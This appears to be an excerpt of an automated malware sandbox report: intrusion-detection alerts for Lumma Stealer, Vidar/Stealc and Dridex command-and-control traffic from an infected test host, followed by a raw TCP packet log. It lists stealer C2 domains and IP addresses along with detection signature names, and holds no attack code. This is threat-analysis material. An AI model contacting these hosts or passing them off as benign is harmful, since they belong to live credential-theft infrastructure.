2024-09-26T20:14:59.711457+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49738	5.75.211.162	443	TCP
2024-09-26T20:15:02.153136+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49739	172.105.54.160	443	TCP
2024-09-26T20:15:03.681283+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.5	50647	1.1.1.1	53	UDP
2024-09-26T20:15:04.005893+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49740	5.75.211.162	443	TCP
2024-09-26T20:15:04.195932+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.5	49741	188.114.96.3	443	TCP
2024-09-26T20:15:04.673123+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49741	188.114.96.3	443	TCP
2024-09-26T20:15:04.673123+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49741	188.114.96.3	443	TCP
2024-09-26T20:15:04.677174+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.5	57503	1.1.1.1	53	UDP
2024-09-26T20:15:05.194897+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.5	49742	172.67.132.32	443	TCP
2024-09-26T20:15:05.660006+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49742	172.67.132.32	443	TCP
2024-09-26T20:15:05.660006+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49742	172.67.132.32	443	TCP
2024-09-26T20:15:06.211464+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.5	49744	188.114.96.3	443	TCP
2024-09-26T20:15:06.467974+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49743	172.105.54.160	443	TCP
2024-09-26T20:15:06.782806+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49744	188.114.96.3	443	TCP
2024-09-26T20:15:06.782806+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49744	188.114.96.3	443	TCP
2024-09-26T20:15:06.785777+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.5	61063	1.1.1.1	53	UDP
2024-09-26T20:15:07.279932+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.5	49745	188.114.97.3	443	TCP
2024-09-26T20:15:07.757120+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49745	188.114.97.3	443	TCP
2024-09-26T20:15:07.757120+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49745	188.114.97.3	443	TCP
2024-09-26T20:15:07.796964+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.5	60331	1.1.1.1	53	UDP
2024-09-26T20:15:08.326468+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.5	49747	188.114.96.3	443	TCP
2024-09-26T20:15:08.377162+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49746	5.75.211.162	443	TCP
2024-09-26T20:15:08.851472+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49747	188.114.96.3	443	TCP
2024-09-26T20:15:08.851472+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49747	188.114.96.3	443	TCP
2024-09-26T20:15:08.854602+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.5	53384	1.1.1.1	53	UDP
2024-09-26T20:15:10.172517+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.5	49748	172.67.162.108	443	TCP
2024-09-26T20:15:10.629211+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49748	172.67.162.108	443	TCP
2024-09-26T20:15:10.629211+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49748	172.67.162.108	443	TCP
2024-09-26T20:15:10.632491+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.5	63469	1.1.1.1	53	UDP
2024-09-26T20:15:10.822931+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49749	5.75.211.162	443	TCP
2024-09-26T20:15:11.124806+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.5	49750	188.114.96.3	443	TCP
2024-09-26T20:15:11.606480+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49750	188.114.96.3	443	TCP
2024-09-26T20:15:11.606480+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49750	188.114.96.3	443	TCP
2024-09-26T20:15:11.608917+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.5	65058	1.1.1.1	53	UDP
2024-09-26T20:15:12.152000+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.5	49752	188.114.97.3	443	TCP
2024-09-26T20:15:12.353249+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.5	49751	45.132.206.251	80	TCP
2024-09-26T20:15:12.629221+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49752	188.114.97.3	443	TCP
2024-09-26T20:15:12.629221+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49752	188.114.97.3	443	TCP
2024-09-26T20:15:12.658468+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.5	60357	1.1.1.1	53	UDP
2024-09-26T20:15:13.174833+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.5	49753	172.67.208.139	443	TCP
2024-09-26T20:15:13.637552+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49753	172.67.208.139	443	TCP
2024-09-26T20:15:13.637552+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49753	172.67.208.139	443	TCP
2024-09-26T20:15:15.906884+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49755	104.21.2.13	443	TCP
2024-09-26T20:15:15.906884+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49755	104.21.2.13	443	TCP
2024-09-26T20:15:39.619646+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49758	5.75.211.162	443	TCP
2024-09-26T20:15:40.921560+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49759	5.75.211.162	443	TCP
2024-09-26T20:15:42.308011+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49760	5.75.211.162	443	TCP
2024-09-26T20:15:43.666845+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49761	5.75.211.162	443	TCP
2024-09-26T20:15:44.368415+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.5	49761	TCP
2024-09-26T20:15:45.015846+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49762	5.75.211.162	443	TCP
2024-09-26T20:15:45.703035+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.5	49762	TCP
2024-09-26T20:15:46.413846+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49763	5.75.211.162	443	TCP
2024-09-26T20:15:47.412398+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49764	5.75.211.162	443	TCP
2024-09-26T20:15:50.364989+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49765	5.75.211.162	443	TCP
2024-09-26T20:15:51.480047+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49766	5.75.211.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 20:14:23.227525949 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:23.227580070 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:23.227652073 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:23.231777906 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:23.231794119 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.036144018 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.036222935 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.102344036 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.102411985 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.102701902 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.102762938 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.104597092 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.151401043 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.541537046 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.541560888 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.541575909 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.541618109 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.541657925 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.541672945 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.541698933 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.659568071 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.659584045 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.659722090 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.659740925 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.662564039 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.664649963 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.664736032 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.664747953 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.664788008 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.665066957 CEST	49715	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:14:24.665086031 CEST	443	49715	104.102.49.254	192.168.2.5
Sep 26, 2024 20:14:24.676373959 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:24.676405907 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:24.676496029 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:24.676780939 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:24.676789999 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:25.533416986 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:25.533528090 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:25.537350893 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:25.537355900 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:25.537585974 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:25.537646055 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:25.538124084 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:25.583389997 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.030751944 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.030852079 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.030859947 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.030901909 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.030905962 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.030937910 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.030946016 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.031023026 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.033437014 CEST	49716	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.033447981 CEST	443	49716	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.035537958 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.035584927 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.035650969 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.035859108 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.035877943 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.699604034 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.699712038 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.700187922 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.700216055 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:26.702028036 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:26.702042103 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:27.404464960 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:27.404541016 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:27.404551029 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:27.404611111 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:27.404690981 CEST	49717	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:27.404733896 CEST	443	49717	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:27.406291962 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:27.406352043 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:27.406436920 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:27.406645060 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:27.406681061 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.111639023 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.111725092 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.112375975 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.112385035 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.114348888 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.114355087 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.830482006 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.830507040 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.830547094 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.830579996 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.830604076 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.830610991 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.830636024 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.830657959 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.830874920 CEST	49718	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.830893040 CEST	443	49718	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.832360983 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.832400084 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:28.832489014 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.832794905 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:28.832803965 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:29.523554087 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:29.523708105 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:29.524580002 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:29.524586916 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:29.526706934 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:29.526714087 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.232958078 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.232976913 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.233048916 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.233077049 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.233118057 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.233375072 CEST	49719	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.233386993 CEST	443	49719	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.238404989 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.238452911 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.238529921 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.239134073 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.239151001 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.897233009 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.897294998 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.897701025 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.897710085 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:30.899765968 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:30.899771929 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:31.608217955 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:31.608309984 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:31.608403921 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:31.608403921 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:31.608458996 CEST	49720	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:31.608481884 CEST	443	49720	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:31.684617996 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:31.684698105 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:31.684782982 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:31.684983015 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:31.685019970 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:32.361907005 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:32.363641977 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:32.365793943 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:32.365818977 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:32.368000984 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:32.368032932 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:32.368082047 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:32.368102074 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:32.695444107 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:32.695513010 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:32.695846081 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:32.699059963 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:32.699094057 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.036192894 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.036258936 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.036298037 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.036349058 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.037353992 CEST	49721	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.037388086 CEST	443	49721	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.403738022 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.403812885 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.404624939 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.404635906 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.407296896 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.407305002 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.835814953 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.835840940 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.835858107 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.835933924 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.836014032 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.836055040 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.836072922 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.836102009 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.836134911 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.866663933 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.866681099 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.866789103 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.866800070 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.866863012 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.933883905 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.933902025 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.933974028 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.933991909 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.934046030 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.976408005 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.976424932 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.976488113 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:33.976501942 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:33.976550102 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.003072977 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.003091097 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.003218889 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.003242970 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.003310919 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.049607038 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.049626112 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.049840927 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.049860954 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.049921989 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.055025101 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.055042028 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.055118084 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.055134058 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.055205107 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.070317030 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.070334911 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.070411921 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.070420027 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.070472956 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.088056087 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.088072062 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.088144064 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.088160992 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.088228941 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.102868080 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.102885008 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.102972031 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.103003025 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.103060961 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.120174885 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.120193005 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.120280027 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.120299101 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.120354891 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.140818119 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.140835047 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.140928030 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.140943050 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.140995026 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.150408983 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.150425911 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.150628090 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.150643110 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.150718927 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.164035082 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.164052010 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.164128065 CEST	49722	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:34.164135933 CEST	443	49722	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:34.164177895 CEST	49722	443	192.168.2.5	5.75.211.162
